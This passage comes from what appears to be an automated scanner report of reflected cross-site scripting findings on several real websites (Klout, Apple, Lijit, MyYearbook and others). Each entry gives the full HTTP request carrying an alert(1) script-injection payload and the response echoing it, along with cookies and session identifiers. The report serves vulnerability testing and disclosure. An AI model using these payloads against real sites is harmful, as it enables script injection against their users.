cb95731872f
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visitor/addons/deploy2.asp?site=54909046d539f%0acb95731872f&d_id=ndb-sales&default=simpleDeploy HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/?linkid=WWW_Z_NDB_A6A58_SP30_C1_01_T_SP1SP1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 14079
Cache-Control: public, max-age=3600
Date: Fri, 22 Jul 2011 20:32:10 GMT
Connection: close

//Plugins for site 54909046d539f
cb95731872f

lpAddMonitorTag();
if(typeof lpMTagConfig!="undefined")lpMTagConfig.getLPVarValue=function(c){if(!lpMTagConfig.varLookup){lpMTagConfig.varLookup={};for(var b=0;b<lpMTagConfig.vars.length;b++){var a=
...[SNIP]...

3.91. http://syn.5min.com/handlers/SenseHandler.ashx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://syn.5min.com
Path:   /handlers/SenseHandler.ashx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ae349<script>alert(1)</script>d4acfa4c84b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /handlers/SenseHandler.ashx?func=GetResults&thumbSeedCounter=0&sid=768&categories=6%2C5%2C8%2C4%2C13%2C2%2C14&fallback=0&fallbackType=featured&textLocation=1&thumbnailSize=0&width=468&height=200&NumOfColumnsAsked=3&NumOfRowsAsked=1&url=http%3A%2F%2Fwww.lifescript.com%2FHealth%2FConditions%2FADD%2FHow_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&isnewts=true&callback=FIVEMIN.RequestManager.callbacks[71787]&ae349<script>alert(1)</script>d4acfa4c84b=1 HTTP/1.1
Host: syn.5min.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Server: fmv-m06 - syn
Date: Thu, 21 Jul 2011 19:24:43 GMT
Content-Length: 50062

FIVEMIN.RequestManager.callbacks[71787]({"binding":[{"ID":338597705,"Title":"Helping Adults with ADHD Become More Organized","WrapTitle":"Helping Adults with ADHD Become More Organized","ThumbURL":"ht
...[SNIP]...
52fHow_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%253futm_source%253doutbrain%2526utm_medium%253dcpc%2526utm_campaign%253dADHD_Adult&isnewts=true&callback=FIVEMIN.RequestManager.callbacks%255b71787%255d&ae349<script>alert(1)</script>d4acfa4c84b=1&endUrl=1&logvCQ=4&logmId=110165741&logvGeo=0&logvExp=2147483647&logsKey=1&logvf=0&endUrlLog=1","IsFlagged":false,"mId":110165741,"vCat":260,"vCQ":4,"vExp":2147483647,"vGeo":0,"vf":0,"vFlg":0},{"ID":
...[SNIP]...

3.92. http://widgets.klout.com/ [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.klout.com
Path:   /

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99f63"><script>alert(1)</script>22ad580a563 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?from=ks99f63"><script>alert(1)</script>22ad580a563 HTTP/1.1
Host: widgets.klout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: useBeta=1; forcedBeta=1; arrival_cookie=98b56134fc99bed15f2fd5a80818ad795283fd8c129697d9e64225945a634518a599f407fbb43ecf4a658b9ddf1a7db104c0d63b0746cfa03aaae1ab863abc117bdbb02d3db71de68697ce8ebe3b140cc694f4b6b9ac4bf3e11f81dffb4fbe1533cd73f68e028d22f98ab3055e53149c2adff152894de28de8dcf45425320dd945ad7c826560b357796ca6dc6d533ba78ba27924bdfc3a27ae4551253c31a845794d816ada889934d5f388625fc9e08a450fa5909e6636d6f9b6142468d27d5d3cc846223b4e70019c67a324da173d7e2040d7a91ae12b06d845ee0ecfc1a68b; __qca=P0-2053982506-1311432752930; __unam=c3eadea-131577bf952-48e618ce-1; __utma=261428178.226286795.1311432753.1311432753.1311432753.1; __utmb=261428178.5.10.1311432753; __utmc=261428178; __utmz=261428178.1311432753.1.1.utmcsr=klout.com|utmccn=(referral)|utmcmd=referral|utmcct=/home

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 14:53:07 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.5
Vary: Accept-Encoding
Content-Length: 17995
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Bringing Influen
...[SNIP]...
<a href="http://klout.com/auth/login?prev_page=http://widgets.klout.com/?from=ks99f63"><script>alert(1)</script>22ad580a563">
...[SNIP]...

3.93. http://widgets.klout.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.klout.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7db0"><script>alert(1)</script>00158fd2c7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?from=ks&a7db0"><script>alert(1)</script>00158fd2c7d=1 HTTP/1.1
Host: widgets.klout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: useBeta=1; forcedBeta=1; arrival_cookie=98b56134fc99bed15f2fd5a80818ad795283fd8c129697d9e64225945a634518a599f407fbb43ecf4a658b9ddf1a7db104c0d63b0746cfa03aaae1ab863abc117bdbb02d3db71de68697ce8ebe3b140cc694f4b6b9ac4bf3e11f81dffb4fbe1533cd73f68e028d22f98ab3055e53149c2adff152894de28de8dcf45425320dd945ad7c826560b357796ca6dc6d533ba78ba27924bdfc3a27ae4551253c31a845794d816ada889934d5f388625fc9e08a450fa5909e6636d6f9b6142468d27d5d3cc846223b4e70019c67a324da173d7e2040d7a91ae12b06d845ee0ecfc1a68b; __qca=P0-2053982506-1311432752930; __unam=c3eadea-131577bf952-48e618ce-1; __utma=261428178.226286795.1311432753.1311432753.1311432753.1; __utmb=261428178.5.10.1311432753; __utmc=261428178; __utmz=261428178.1311432753.1.1.utmcsr=klout.com|utmccn=(referral)|utmcmd=referral|utmcct=/home

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 14:53:07 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.5
Vary: Accept-Encoding
Content-Length: 18001
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Bringing Influen
...[SNIP]...
<a href="http://klout.com/auth/login?prev_page=http://widgets.klout.com/?from=ks&a7db0"><script>alert(1)</script>00158fd2c7d=1">
...[SNIP]...

3.94. http://www.apple.com/global/scripts/search_featured.php [q parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.apple.com
Path:   /global/scripts/search_featured.php

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 13c5d<a>52f5b9de88c was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /global/scripts/search_featured.php?q=xss13c5d<a>52f5b9de88c&section=global&geo=us HTTP/1.1
Host: www.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/search/?q=xss
X-Prototype-Version: 1.7
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D; ccl=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; geo=US

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix)
ntCoent-Length: 91
Content-Type: text/xml
Content-Length: 91
Vary: Accept-Encoding
Cache-Control: max-age=579
Expires: Thu, 21 Jul 2011 20:57:03 GMT
Date: Thu, 21 Jul 2011 20:47:24 GMT
Connection: close

<shortcuts><term>xss13c5d<a>52f5b9de88c</term><search_results></search_results></shortcuts>

3.95. http://www.lijit.com/delivery/fp [n parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /delivery/fp

Issue detail

The value of the n request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37c7d"%3balert(1)//5cbd0c080c3 was submitted in the n parameter. This input was echoed as 37c7d";alert(1)//5cbd0c080c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /delivery/fp?u=curse&z=125814&n=137c7d"%3balert(1)//5cbd0c080c3 HTTP/1.1
Host: www.lijit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://c627028.r28.cf2.rackcdn.com/v36defaultsusa728x90btf.html
Cookie: ljt_reader=8ca95226d166ed67e0a44dc3d93140ea; ljtrtb=eJyrVjJUslIyMTQxMzUxMTI0MDSwMDYzNDI1U6oFAE8JBbs%3D

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 04:49:31 GMT
Server: PWS/1.7.3.3
X-Px: ms iad-agg-n28 ( iad-agg-n5), ms iad-agg-n5 ( origin>CONN)
Cache-Control: max-age=7200
Expires: Sat, 23 Jul 2011 06:49:31 GMT
Age: 0
Content-Length: 15044
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive

function LjtAds_ReportError(errorMsg, except){
   try{
       errorMsg = "[Ads JS] "+ errorMsg
       try{
           errorMsg += " - "+ except.message
       } catch(e){}
       errorMsg = encodeURIComponent(errorMsg);
       
       var s
...[SNIP]...
get Time String', e);
       return "00:00:00";
   }
}

try{
   // Settings: Change these values on a per user basis
   var lwp_ad_username = "curse";
   var lwp_ad_zoneid = ljt_getZoneID();
   var lwp_ad_numads = "137c7d";alert(1)//5cbd0c080c3";
   var lwp_ad_premium = "1";// or 0 for non-premium ad
   var lwp_ad_eleid = "lijit_region_125814";
   var lwp_method = "regex";
   var lwp_referring_search = getReferringSearch(document.referrer);
   
   var l
...[SNIP]...

3.96. http://www.myyearbook.com/advertising/default.php [n parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myyearbook.com
Path:   /advertising/default.php

Issue detail

The value of the n request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3248a</script><script>alert(1)</script>30706a77c6b was submitted in the n parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertising/default.php?n=TribalFusion3248a</script><script>alert(1)</script>30706a77c6b&section=None&size=728x90&site=MYB&sub=Network HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:41 GMT
Server: Apache
X-Server-Name: web10
Content-Length: 888
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.10.245

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascri
...[SNIP]...
<script type="text/javascript">
GA_googleAddSlot("ca-pub-8250125438595222", "Default_TribalFusion3248a</script><script>alert(1)</script>30706a77c6b_MYB_728x90_None_Network");
</script>
...[SNIP]...

3.97. http://www.myyearbook.com/advertising/default.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myyearbook.com
Path:   /advertising/default.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f145c</script><script>alert(1)</script>43acc39f631 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Net/f145c</script><script>alert(1)</script>43acc39f631work HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:43 GMT
Server: Apache
X-Server-Name: web54
Content-Length: 890
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.10.121

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascri
...[SNIP]...
<script type="text/javascript">
GA_googleAddSlot("ca-pub-8250125438595222", "Default_TribalFusion_MYB_728x90_None_Net/f145c</script><script>alert(1)</script>43acc39f631work");
</script>
...[SNIP]...

3.98. http://www.myyearbook.com/advertising/default.php [section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myyearbook.com
Path:   /advertising/default.php

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84675</script><script>alert(1)</script>7ee31c862b0 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertising/default.php?n=TribalFusion&section=None84675</script><script>alert(1)</script>7ee31c862b0&size=728x90&site=MYB&sub=Network HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:41 GMT
Server: Apache
X-Server-Name: web16-new
Content-Length: 938
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.10.4

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascri
...[SNIP]...
<script type="text/javascript">
GA_googleAddSlot("ca-pub-8250125438595222", "Default_TribalFusion_MYB_728x90_None84675</script><script>alert(1)</script>7ee31c862b0_Network");
</script>
...[SNIP]...

3.99. http://www.myyearbook.com/advertising/default.php [section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myyearbook.com
Path:   /advertising/default.php

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d66ee</script><script>alert(1)</script>0f8920e32d5 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertising/default.php?n=TribalFusion&section=Noned66ee</script><script>alert(1)</script>0f8920e32d5&size=728x90&site=MYB&sub=Network HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:41 GMT
Server: Apache
X-Server-Name: web25
Content-Length: 938
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.10.74

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascri
...[SNIP]...
<script type="text/javascript">
GA_googleAddAttr('Section','Noned66ee</script><script>alert(1)</script>0f8920e32d5');
</script>
...[SNIP]...

3.100. http://www.myyearbook.com/advertising/default.php [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myyearbook.com
Path:   /advertising/default.php

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d38c9</script><script>alert(1)</script>c625e2bc1cf was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYBd38c9</script><script>alert(1)</script>c625e2bc1cf&sub=Network HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:42 GMT
Server: Apache
X-Server-Name: web63
Content-Length: 888
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.10.213

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascri
...[SNIP]...
<script type="text/javascript">
GA_googleAddSlot("ca-pub-8250125438595222", "Default_TribalFusion_MYBd38c9</script><script>alert(1)</script>c625e2bc1cf_728x90_None_Network");
</script>
...[SNIP]...

3.101. http://www.myyearbook.com/advertising/default.php [size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myyearbook.com
Path:   /advertising/default.php

Issue detail

The value of the size request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 301ff</script><script>alert(1)</script>e2929316508 was submitted in the size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertising/default.php?n=TribalFusion&section=None&size=728x90301ff</script><script>alert(1)</script>e2929316508&site=MYB&sub=Network HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:42 GMT
Server: Apache
X-Server-Name: web62
Content-Length: 888
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.10.212

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascri
...[SNIP]...
<script type="text/javascript">
